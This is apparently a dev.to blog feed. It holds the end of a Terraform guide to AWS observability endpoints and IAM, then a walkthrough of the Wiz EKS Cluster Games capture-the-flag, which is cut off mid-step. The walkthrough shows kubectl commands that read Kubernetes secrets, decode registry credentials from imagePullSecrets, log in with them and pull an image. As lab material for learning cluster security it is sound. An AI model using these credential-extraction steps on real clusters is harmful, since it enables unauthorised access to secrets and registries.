class="s2">"loki"</span> <span class="p">{</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">vpc_id</span> <span class="nx">service_name</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">loki_service_name</span> <span class="nx">vpc_endpoint_type</span> <span class="p">=</span> <span class="s2">"Interface"</span> <span class="nx">security_group_ids</span> <span class="p">=</span> <span class="p">[</span><span class="nx">aws_security_group</span><span class="p">.</span><span class="nx">observability</span><span class="p">.</span><span class="nx">id</span><span class="p">]</span> <span class="nx">subnet_ids</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">private_subnet_ids</span> <span class="nx">private_dns_enabled</span> <span class="p">=</span> <span class="kc">false</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_vpc_endpoint"</span> <span class="s2">"tempo"</span> <span class="p">{</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">vpc_id</span> <span class="nx">service_name</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">tempo_service_name</span> <span class="nx">vpc_endpoint_type</span> <span class="p">=</span> <span class="s2">"Interface"</span> <span class="nx">security_group_ids</span> <span class="p">=</span> <span class="p">[</span><span class="nx">aws_security_group</span><span class="p">.</span><span class="nx">observability</span><span class="p">.</span><span class="nx">id</span><span class="p">]</span> <span class="nx">subnet_ids</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">private_subnet_ids</span> <span class="nx">private_dns_enabled</span> <span class="p">=</span> <span class="kc">false</span> <span class="p">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform.tfvars</span> <span class="nx">eks_nlb_endpoint_services</span> <span class="err">=</span> <span class="p">{</span> <span class="nx">prometheus</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">nlb_arn</span> <span class="p">=</span> <span class="p">[</span> <span class="s2">"arn:aws:elasticloadbalancing:us-west-2:${data.aws_caller_identity.current.account_id}:loadbalancer/net/xxxx-yyyy/zzzz"</span> <span class="p">]</span> <span class="nx">allowed_principals</span> <span class="p">=</span> <span class="p">[</span><span class="s2">"arn:aws:iam::123456789012:root"</span><span class="p">]</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">loki_service_name</span> <span class="err">=</span> <span class="s2">"com.amazonaws.vpce.us-west-2.vpce-svc-qwertyuiop"</span> <span class="nx">tempo_service_name</span> <span class="err">=</span> <span class="s2">"com.amazonaws.vpce.us-west-2.vpce-svc-qwertyuiop"</span> <span class="nx">vpc_id</span> <span class="err">=</span> <span class="s2">"vpc-xxxxx"</span> <span class="nx">private_subnet_ids</span> <span class="err">=</span> <span class="p">[</span><span class="s2">"subnet-xxxxx"</span><span class="p">,</span> <span class="s2">"subnet-yyyyy"</span><span class="p">]</span> <span class="nx">name_prefix</span> <span class="err">=</span> <span class="s2">"char"</span> </code></pre> </div> <h4> Root account </h4> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># variables.tf</span> <span class="nx">variable</span> <span class="s2">"account_id"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"name_prefix"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"vpc_id"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"private_subnet_ids"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">list</span><span class="p">(</span><span class="nx">string</span><span class="p">)</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"allowed_principals"</span> <span class="p">{</span> <span class="nx">description</span> <span class="p">=</span> <span class="s2">"Allowed AWS account principals for VPC endpoint services"</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">list</span><span class="p">(</span><span class="nx">string</span><span class="p">)</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"loki_nlb_arns"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">list</span><span class="p">(</span><span class="nx">string</span><span class="p">)</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"tempo_nlb_arns"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">list</span><span class="p">(</span><span class="nx">string</span><span class="p">)</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"char_normal_prometheus_vpcesvc_name"</span> <span class="p">{</span> <span class="nx">description</span> <span class="p">=</span> <span class="s2">"VPC Endpoint Service name for Prometheus; normal account"</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"char_sparkling_prometheus_vpcesvc_name"</span> <span class="p">{</span> <span class="nx">description</span> <span class="p">=</span> <span class="s2">"VPC Endpoint Service name for Prometheus; sparkling account"</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="p">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># s3.tf</span> <span class="nx">resource</span> <span class="s2">"aws_s3_bucket"</span> <span class="s2">"loki_chunks"</span> <span class="p">{</span> <span class="nx">bucket</span> <span class="p">=</span> <span class="s2">"${var.name_prefix}-${var.account_id}-loki-chunks"</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_s3_bucket"</span> <span class="s2">"loki_ruler"</span> <span class="p">{</span> <span class="nx">bucket</span> <span class="p">=</span> <span class="s2">"${var.name_prefix}-${var.account_id}-loki-ruler"</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_s3_bucket"</span> <span class="s2">"tempo"</span> <span class="p">{</span> <span class="nx">bucket</span> <span class="p">=</span> <span class="s2">"${var.name_prefix}-${var.account_id}-tempo-traces"</span> <span class="p">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># iam.tf</span> <span class="nx">resource</span> <span class="s2">"aws_iam_policy"</span> <span class="s2">"loki_buckets"</span> <span class="p">{</span> <span class="nx">name</span> <span class="p">=</span> <span class="s2">"${var.name_prefix}-loki-buckets"</span> <span class="nx">policy</span> <span class="p">=</span> <span class="nx">jsonencode</span><span class="p">({</span> <span class="nx">Version</span> <span class="p">=</span> <span class="s2">"2012-10-17"</span> <span class="nx">Statement</span> <span class="p">=</span> <span class="p">[</span> <span class="p">{</span> <span class="nx">Sid</span> <span class="p">=</span> <span class="s2">"LokiBuckets"</span> <span class="nx">Effect</span> <span class="p">=</span> <span class="s2">"Allow"</span> <span class="nx">Action</span> <span class="p">=</span> <span class="p">[</span> <span class="s2">"s3:ListBucket"</span><span class="p">,</span> <span class="s2">"s3:PutObject"</span><span class="p">,</span> <span class="s2">"s3:GetObject"</span><span class="p">,</span> <span class="s2">"s3:DeleteObject"</span> <span class="p">]</span> <span class="nx">Resource</span> <span class="p">=</span> <span class="p">[</span> <span class="nx">aws_s3_bucket</span><span class="p">.</span><span class="nx">loki_chunks</span><span class="p">.</span><span class="nx">arn</span><span class="p">,</span> <span class="s2">"${aws_s3_bucket.loki_chunks.arn}/*"</span><span class="p">,</span> <span class="nx">aws_s3_bucket</span><span class="p">.</span><span class="nx">loki_ruler</span><span class="p">.</span><span class="nx">arn</span><span class="p">,</span> <span class="s2">"${aws_s3_bucket.loki_ruler.arn}/*"</span> <span class="p">]</span> <span class="p">}</span> <span class="p">]</span> <span class="p">})</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_iam_role"</span> <span class="s2">"loki_pod_identity"</span> <span class="p">{</span> <span class="nx">name</span> <span class="p">=</span> <span class="s2">"${var.name_prefix}-loki-pod-identity"</span> <span class="nx">assume_role_policy</span> <span class="p">=</span> <span class="nx">jsonencode</span><span class="p">({</span> <span class="nx">Version</span> <span class="p">=</span> <span class="s2">"2012-10-17"</span> <span class="nx">Statement</span> <span class="p">=</span> <span class="p">[</span> <span class="p">{</span> <span class="nx">Sid</span> <span class="p">=</span> <span class="s2">"AllowEksAuthToAssumeRoleForPodIdentity"</span> <span class="nx">Effect</span> <span class="p">=</span> <span class="s2">"Allow"</span> <span class="nx">Principal</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Service</span> <span class="p">=</span> <span class="s2">"pods.eks.amazonaws.com"</span> <span class="p">}</span> <span class="nx">Action</span> <span class="p">=</span> <span class="p">[</span> <span class="s2">"sts:AssumeRole"</span><span class="p">,</span> <span class="s2">"sts:TagSession"</span> <span class="p">]</span> <span class="p">}</span> <span class="p">]</span> <span class="p">})</span> <span class="nx">tags</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">common_tags</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_iam_role_policy_attachment"</span> <span class="s2">"loki_pod_identity"</span> <span class="p">{</span> <span class="nx">role</span> <span class="p">=</span> <span class="nx">aws_iam_role</span><span class="p">.</span><span class="nx">loki_pod_identity</span><span class="p">.</span><span class="nx">name</span> <span class="nx">policy_arn</span> <span class="p">=</span> <span class="nx">aws_iam_policy</span><span class="p">.</span><span class="nx">loki_buckets</span><span class="p">.</span><span class="nx">arn</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_iam_policy"</span> <span class="s2">"tempo_bucket"</span> <span class="p">{</span> <span class="nx">name</span> <span class="p">=</span> <span class="s2">"${var.name_prefix}-tempo-bucket"</span> <span class="nx">policy</span> <span class="p">=</span> <span class="nx">jsonencode</span><span class="p">({</span> <span class="nx">Version</span> <span class="p">=</span> <span class="s2">"2012-10-17"</span> <span class="nx">Statement</span> <span class="p">=</span> <span class="p">[</span> <span class="p">{</span> <span class="nx">Sid</span> <span class="p">=</span> <span class="s2">"LokiBuckets"</span> <span class="nx">Effect</span> <span class="p">=</span> <span class="s2">"Allow"</span> <span class="nx">Action</span> <span class="p">=</span> <span class="p">[</span> <span class="s2">"s3:ListBucket"</span><span class="p">,</span> <span class="s2">"s3:PutObject"</span><span class="p">,</span> <span class="s2">"s3:GetObject"</span><span class="p">,</span> <span class="s2">"s3:DeleteObject"</span><span class="p">,</span> <span class="s2">"s3:GetObjectTagging"</span><span class="p">,</span> <span class="s2">"s3:PutObjectTagging"</span> <span class="p">]</span> <span class="nx">Resource</span> <span class="p">=</span> <span class="p">[</span> <span class="nx">aws_s3_bucket</span><span class="p">.</span><span class="nx">tempo</span><span class="p">.</span><span class="nx">arn</span><span class="p">,</span> <span class="s2">"${aws_s3_bucket.tempo.arn}/*"</span> <span class="p">]</span> <span class="p">}</span> <span class="p">]</span> <span class="p">})</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_iam_role"</span> <span class="s2">"tempo_pod_identity"</span> <span class="p">{</span> <span class="nx">name</span> <span class="p">=</span> <span class="s2">"${var.name_prefix}-tempo-pod-identity"</span> <span class="nx">assume_role_policy</span> <span class="p">=</span> <span class="nx">jsonencode</span><span class="p">({</span> <span class="nx">Version</span> <span class="p">=</span> <span class="s2">"2012-10-17"</span> <span class="nx">Statement</span> <span class="p">=</span> <span class="p">[</span> <span class="p">{</span> <span class="nx">Sid</span> <span class="p">=</span> <span class="s2">"AllowEksAuthToAssumeRoleForPodIdentity"</span> <span class="nx">Effect</span> <span class="p">=</span> <span class="s2">"Allow"</span> <span class="nx">Principal</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Service</span> <span class="p">=</span> <span class="s2">"pods.eks.amazonaws.com"</span> <span class="p">}</span> <span class="nx">Action</span> <span class="p">=</span> <span class="p">[</span> <span class="s2">"sts:AssumeRole"</span><span class="p">,</span> <span class="s2">"sts:TagSession"</span> <span class="p">]</span> <span class="p">}</span> <span class="p">]</span> <span class="p">})</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_iam_role_policy_attachment"</span> <span class="s2">"tempo_pod_identity"</span> <span class="p">{</span> <span class="nx">role</span> <span class="p">=</span> <span class="nx">aws_iam_role</span><span class="p">.</span><span class="nx">tempo_pod_identity</span><span class="p">.</span><span class="nx">name</span> <span class="nx">policy_arn</span> <span class="p">=</span> <span class="nx">aws_iam_policy</span><span class="p">.</span><span class="nx">tempo_bucket</span><span class="p">.</span><span class="nx">arn</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_eks_pod_identity_association"</span> <span class="s2">"loki"</span> <span class="p">{</span> <span class="nx">cluster_name</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">name_prefix</span> <span class="nx">namespace</span> <span class="p">=</span> <span class="s2">"monitoring"</span> <span class="nx">service_account</span> <span class="p">=</span> <span class="s2">"loki"</span> <span class="nx">role_arn</span> <span class="p">=</span> <span class="nx">aws_iam_role</span><span class="p">.</span><span class="nx">loki_pod_identity</span><span class="p">.</span><span class="nx">arn</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_eks_pod_identity_association"</span> <span class="s2">"tempo"</span> <span class="p">{</span> <span class="nx">cluster_name</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">name_prefix</span> <span class="nx">namespace</span> <span class="p">=</span> <span class="s2">"monitoring"</span> <span class="nx">service_account</span> <span class="p">=</span> <span class="s2">"tempo"</span> <span class="nx">role_arn</span> <span class="p">=</span> <span class="nx">aws_iam_role</span><span class="p">.</span><span class="nx">tempo_pod_identity</span><span class="p">.</span><span class="nx">arn</span> <span class="p">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># vpc.tf</span> <span class="nx">resource</span> <span class="s2">"aws_vpc_endpoint_service"</span> <span class="s2">"loki"</span> <span class="p">{</span> <span class="nx">acceptance_required</span> <span class="p">=</span> <span class="kc">true</span> <span class="nx">allowed_principals</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">allowed_principals</span> <span class="nx">network_load_balancer_arns</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">loki_nlb_arns</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_vpc_endpoint_service"</span> <span class="s2">"tempo"</span> <span class="p">{</span> <span class="nx">acceptance_required</span> <span class="p">=</span> <span class="kc">true</span> <span class="nx">allowed_principals</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">allowed_principals</span> <span class="nx">network_load_balancer_arns</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">tempo_nlb_arns</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_vpc_endpoint"</span> <span class="s2">"char-normal-prometheus"</span> <span class="p">{</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">vpc_id</span> <span class="nx">service_name</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">char_normal_vpcesvc_name</span> <span class="nx">vpc_endpoint_type</span> <span class="p">=</span> <span class="s2">"Interface"</span> <span class="nx">security_group_ids</span> <span class="p">=</span> <span class="p">[</span><span class="nx">aws_security_group</span><span class="p">.</span><span class="nx">observability</span><span class="p">.</span><span class="nx">id</span><span class="p">]</span> <span class="nx">subnet_ids</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">private_subnet_ids</span> <span class="nx">private_dns_enabled</span> <span class="p">=</span> <span class="kc">false</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_vpc_endpoint"</span> <span class="s2">"char-sparkling-prometheus"</span> <span class="p">{</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">vpc_id</span> <span class="nx">service_name</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">char_sparkling_vpcesvc_name</span> <span class="nx">vpc_endpoint_type</span> <span class="p">=</span> <span class="s2">"Interface"</span> <span class="nx">security_group_ids</span> <span class="p">=</span> <span class="p">[</span><span class="nx">aws_security_group</span><span class="p">.</span><span class="nx">observability</span><span class="p">.</span><span class="nx">id</span><span class="p">]</span> <span class="nx">subnet_ids</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">private_subnet_ids</span> <span class="nx">private_dns_enabled</span> <span class="p">=</span> <span class="kc">false</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_security_group"</span> <span class="s2">"observability"</span> <span class="p">{</span> <span class="nx">name</span> <span class="p">=</span> <span class="s2">"observability"</span> <span class="nx">description</span> <span class="p">=</span> <span class="s2">"Allow traffic from observability resources"</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">vpc_id</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_vpc_security_group_ingress_rule"</span> <span class="s2">"prometheus"</span> <span class="p">{</span> <span class="nx">security_group_id</span> <span class="p">=</span> <span class="nx">aws_security_group</span><span class="p">.</span><span class="nx">observability</span><span class="p">.</span><span class="nx">id</span> <span class="nx">cidr_ipv4</span> <span class="p">=</span> <span class="s2">"10.0.0.0/16"</span> <span class="nx">from_port</span> <span class="p">=</span> <span class="mi">9090</span> <span class="nx">to_port</span> <span class="p">=</span> <span class="mi">9090</span> <span class="nx">ip_protocol</span> <span class="p">=</span> <span class="s2">"tcp"</span> <span class="p">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform.tfvars.example</span> <span class="nx">account_id</span> <span class="err">=</span> <span class="s2">"123456789012"</span> <span class="nx">name_prefix</span> <span class="err">=</span> <span class="s2">"ketch"</span> <span class="nx">vpc_id</span> <span class="err">=</span> <span class="s2">"vpc-xxxxx"</span> <span class="nx">private_subnet_ids</span> <span class="err">=</span> <span class="p">[</span><span class="s2">"subnet-xxxxx"</span><span class="p">,</span> <span class="s2">"subnet-yyyyy"</span><span class="p">]</span> <span class="nx">loki_nlb_arns</span> <span class="err">=</span> <span class="p">[</span><span class="s2">"arn:aws:elasticloadbalancing:us-west-2:${var.account_id}:loadbalancer/net/xxxx-yyyy/zzzz"</span><span class="p">]</span> <span class="nx">tempo_nlb_arns</span> <span class="err">=</span> <span class="p">[</span><span class="s2">"arn:aws:elasticloadbalancing:us-west-2:${var.account_id}:loadbalancer/net/xxxx-yyyy/zzzz"</span><span class="p">]</span> <span class="nx">char_normal_prometheus_vpcesvc_name</span> <span class="err">=</span> <span class="s2">"com.amazonaws.vpce.us-west-2.vpce-svc-xyz"</span> <span class="nx">char_sparkling_prometheus_vpcesvc_name</span> <span class="err">=</span> <span class="s2">"com.amazonaws.vpce.us-west-2.vpce-svc-xyz"</span> <span class="nx">allowed_principals</span> <span class="err">=</span> <span class="p">[</span> <span class="s2">"arn:aws:iam::111111111111:root"</span><span class="p">,</span> <span class="s2">"arn:aws:iam::222222222222:root"</span> <span class="p">]</span> </code></pre> </div> <ol> <li id="fn1"> <p>It doesn’t matter all that much which approach you choose to implement for monitoring your monitoring. In light of <a href="https://blog.cloudflare.com/18-november-2025-outage/" rel="noopener noreferrer">recent events</a>, some folks even created a <a href="https://downdetectorsdowndetectorsdowndetector.com/" rel="noopener noreferrer">downdetector for a downdetector’s downdetector</a>. I mean, it’s hilariously fun, but the key point remains solid: you need to know whether your eyes and ears (infrastructure-wise) are even working. ↩</p> </li> <li id="fn2"> <p>We assume 100% cross-AZ traffic in this example to maximize potential traffic costs and avoid complicating the calculations with percentages of same-AZ versus cross-AZ traffic. ↩</p> </li> <li id="fn3"> <p>Direct Connect may also require a specific partner to enable and perform the physical connection to the AWS network, so expect to add a few hundred (or even thousands) of dollars on top of the initial bill for setup. ↩</p> </li> </ol> aws eks kubernetes observability Solving EKS Cluster Games Kirill Tue, 30 Sep 2025 15:40:32 +0000 https://dev.to/aws-builders/solving-eks-cluster-games-3i9h https://dev.to/aws-builders/solving-eks-cluster-games-3i9h <p>CTF challenges <a href="https://notes.hatedabamboo.me/the-big-iam-challenge/" rel="noopener noreferrer">continue</a> to be one of my interests for their ability to show me even more ways in which my allegedly "secure" and "solid" infrastructure setup can be accessed by a malicious actor. This time we're gonna discuss the second challenge in a series of CTFs made by <a href="https://www.wiz.io/ctf" rel="noopener noreferrer">WIZ</a>: <a href="https://eksclustergames.com/" rel="noopener noreferrer">EKS Cluster Games</a>.</p> <h2> Secret Seeker </h2> <blockquote> <p>Task:<br> Jumpstart your quest by listing all the secrets in the cluster. Can you spot the flag among them?</p> </blockquote> <p>Kubernetes policy:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"secrets"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"get"</span><span class="p">,</span><span class="w"> </span><span class="s2">"list"</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>For this task we're provided with the following permissions: we can list and read secrets. Okay, let's do exactly that.</p> <p>But before diving into Kubernetes resources, we have a nice welcome message:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>Welcome to Wiz EKS Challenge! For your convenience, the following directories are persistent across sessions: <span class="k">*</span> /home/user <span class="k">*</span> /tmp Use kubectl to start! </code></pre> </div> <p>All right! Having the home directory persistent across sessions means we can make our job easier. Let's start with <em>the</em> alias:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo</span> <span class="s1">'alias k="kubectl"'</span> <span class="o">&gt;&gt;</span> ~/.bashrc <span class="o">&amp;&amp;</span> <span class="nb">source</span> ~/.bashrc </code></pre> </div> <p>And now we won't have to type the long <code>kubectl</code> command ever again (in the scope of this challenge, that is.)</p> <p>Now to the task itself.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# k get secret NAME TYPE DATA AGE log-rotate Opaque 1 674d root@wiz-eks-challenge:~# k get secret log-rotate <span class="nt">-o</span> yaml apiVersion: v1 data: flag: <span class="nv">d2l6X2Vrc19jaGFsbGVuZ2V7b21nX292ZXJfcHJpdmlsZWdlZF9zZWNyZXRfYWNjZXNzfQ</span><span class="o">==</span> kind: Secret <span class="o">{</span>...<span class="o">}</span> </code></pre> </div> <p>And there is our flag! Let's decode it and see the value:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# <span class="nb">echo</span> <span class="s1">'d2l6X2Vrc19jaGFsbGVuZ2V7b21nX292ZXJfcHJpdmlsZWdlZF9zZWNyZXRfYWNjZXNzfQ=='</span> | <span class="nb">base64</span> <span class="nt">-d</span> wiz_eks_challenge<span class="o">{</span>omg_over_privileged_secret_access<span class="o">}</span> </code></pre> </div> <p>So far so good. This was a breeze. Let's see if the following challenges will be as easy.</p> <h2> Registry Hunt </h2> <blockquote> <p>Task:<br> A thing we learned during our research: always check the container registries.</p> </blockquote> <p>Kubernetes policy:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"secrets"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"get"</span><span class="w"> </span><span class="p">],</span><span class="w"> </span><span class="nl">"pods"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"list"</span><span class="p">,</span><span class="w"> </span><span class="s2">"get"</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>With the given policy we can list and get pods, and we can get secrets. But oh bother, we can't actually list secrets! So we will have to somehow find them. Let's start with pods.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# k get pods NAME READY STATUS RESTARTS AGE database-pod-14f9769b 1/1 Running 0 23d root@wiz-eks-challenge:~# k describe pod database-pod-14f9769b Name: database-pod-14f9769b Namespace: challenge2 Priority: 0 &lt;...omitted <span class="k">for </span>brevity...&gt; root@wiz-eks-challenge:~# k describe pod database-pod-14f9769b | <span class="nb">grep</span> <span class="nt">-i</span> secret /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-8cw9p <span class="o">(</span>ro<span class="o">)</span> root@wiz-eks-challenge:~# <span class="nb">ls</span> <span class="nt">-l</span> /var/run/secrets/kubernetes.io/serviceaccount/ total 12 <span class="nt">-rw-r--r--</span><span class="nb">.</span> 1 nobody nogroup 1099 Sep 5 19:47 ca.crt <span class="nt">-rw-r--r--</span><span class="nb">.</span> 1 nobody nogroup 11 Sep 5 19:45 namespace <span class="nt">-rw-r--r--</span><span class="nb">.</span> 1 nobody nogroup 1010 Sep 5 19:45 token </code></pre> </div> <p>Eh, nothing of interest here. Let's try a different approach.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# k get pod database-pod-14f9769b <span class="nt">-o</span> yaml apiVersion: v1 kind: Pod metadata: <span class="o">{</span>...<span class="o">}</span> spec: <span class="o">{</span>...<span class="o">}</span> imagePullSecrets: - name: registry-pull-secrets-16ae8e51 <span class="o">{</span>...<span class="o">}</span> </code></pre> </div> <p>Booyah! There we have it! A handy-dandy <code>imagePullSecrets</code> parameter waiting just for us.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# k get secret registry-pull-secrets-16ae8e51 <span class="nt">-o</span> yaml apiVersion: v1 data: .dockerconfigjson: eyJhdXRocyI6IHsiaW5kZXguZG9ja2VyLmlvL3YxLyI6IHsiYXV0aCI6ICJaV3R6WTJ4MWMzUmxjbWRoYldWek9tUmphM0pmY0dGMFgxbDBibU5XTFZJNE5XMUhOMjAwYkhJME5XbFpVV280Um5WRGJ3PT0ifX19 kind: Secret <span class="o">{</span>...<span class="o">}</span> root@wiz-eks-challenge:~# k get secret registry-pull-secrets-16ae8e51 <span class="nt">-o</span> json | jq <span class="nt">-r</span> <span class="s1">'.data.".dockerconfigjson"'</span> | <span class="nb">base64</span> <span class="nt">-d</span> <span class="o">{</span><span class="s2">"auths"</span>: <span class="o">{</span><span class="s2">"index.docker.io/v1/"</span>: <span class="o">{</span><span class="s2">"auth"</span>: <span class="s2">"ZWtzY2x1c3RlcmdhbWVzOmRja3JfcGF0X1l0bmNWLVI4NW1HN200bHI0NWlZUWo4RnVDbw=="</span><span class="o">}}}</span> </code></pre> </div> <p>From the <code>auth</code> string we can extract the credentials to log in to the registry:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# <span class="nb">echo</span> <span class="nt">-n</span> <span class="s1">'ZWtzY2x1c3RlcmdhbWVzOmRja3JfcGF0X1l0bmNWLVI4NW1HN200bHI0NWlZUWo4RnVDbw=='</span> | <span class="nb">base64</span> <span class="nt">-d</span> eksclustergames:dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo root@wiz-eks-challenge:~# crane auth login docker.io <span class="nt">-u</span> eksclustergames <span class="nt">-p</span> dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo 2025/09/05 19:57:55 logged <span class="k">in </span>via /home/user/.docker/config.json </code></pre> </div> <p>Nice! <em>I'm in!</em></p> <p>Now let's head for that image we're tasked to fetch and dissect.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# crane pull docker.io/eksclustergames/base_ext_image@sha256:c3c280fac41084a821ab0a32d16bd21a887141bcf1330e40adf086c0f0c97888 base_ext_image.tar.gzip root@wiz-eks-challenge:~# <span class="nb">ls</span> <span class="nt">-l</span> total 2104 <span class="nt">-rw-r--r--</span><span class="nb">.</span> 1 root root 2150400 Sep 5 19:59 base_ext_image.tar.gzip root@wiz-eks-challenge:~# <span class="nb">tar </span>xvzf base_ext_image.tar.gzip <span class="nb">gzip</span>: stdin: not <span class="k">in </span><span class="nb">gzip </span>format <span class="nb">tar</span>: Child returned status 1 <span class="nb">tar</span>: Error is not recoverable: exiting now </code></pre> </div> <p>Joke's on me here -- the pulled image was not actually a gzipped tar archive, but a tar archive consisting of several gzipped tar archives. Happens to the best of us!<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@wiz-eks-challenge:~# <span class="nb">mv </span>base_ext_image.tar.gzip base_ext_image.tar root@wiz-eks-challenge:~# <span class="nb">ls</span> <span class="nt">-l</span> total 2104 <span class="nt">-rw-r--r--</span><span class="nb">.</span> 1 root root 2150400 Sep 5 19:59 base_ext_image.tar root@wiz-eks-challenge:~# <span class="nb">tar </span>xvf base_ext_image.tar sha256:62a84aabdaff849b4d1e976aa70ed4d4f5a8e6bed29c7a8fa25603803b72048d 90b9666d4aed1893ff122f238948dfd5e8efdcf6c444fe92371ea0f01750bf8c.tar.gz 71e23506d26b19d0d86d7ca64f9214c31a4ad9ccbff325b45be74ab2a6279e22.tar.gz manifest.json root@wiz-eks-challenge:~# <span class="nb">ls</span> <span class="nt">-l</span> total 4212 <span class="nt">-rw-r--r--</span><span class="nb">.</span> 1 root root 204 Jan 1 1970 71e23506d26b19d0d86d7ca64f9214c31a4ad9ccbff325b45be74ab2a6279e22.tar.gz <span class="nt">-rw-r--r--</span><span class="nb">.</span> 1 root root 2145249 Jan 1 1970 90b9666d4aed1893ff122f238948dfd5e8efdcf6c444fe92371ea0f01750bf8c.tar.gz <span class="nt">-rw-r--r--</span><span class="nb">.</span> 1 root root 2150400 Sep 5 19:59 base_ext_image.tar <span class="nt">-rw-r--r--</span><span class="nb">.</span> 1 root root 322 Jan 1 1970 manifest.json <span class="nt">-rw-r--r--</span><span class="nb">.</span> 1 root root 855 Jan 1 1970 